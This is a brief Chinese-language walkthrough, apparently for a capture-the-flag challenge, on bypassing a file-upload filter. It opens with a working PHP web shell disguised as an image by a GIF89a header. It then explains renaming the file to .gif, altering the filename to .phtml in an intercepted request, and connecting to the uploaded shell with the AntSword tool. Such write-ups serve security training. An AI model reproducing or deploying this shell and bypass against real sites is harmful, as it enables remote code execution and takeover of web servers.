GIF89a
<script language="php">eval($_GET[shell])</script>
通常,在嵌入了php脚本的html中,使用 phtml作为后缀名;完全是php写的,则使用php作为后缀名。这两种文件,web服务器都会用php解释器进行解析。
当不能使用php代码直接注入时可以改为phtml格式加入GIF89a(图片头文件欺骗),后台认为是图片,上传后再执行木马。
先将文件改为.gif欺骗网址第一层,抓包将filename改为以.phtml结尾并以这种方式进行,GIF89a则负责骗过第二层。
通过蚁剑一般连接的是:url/upload/文件名
此题为:
蚁剑连接即可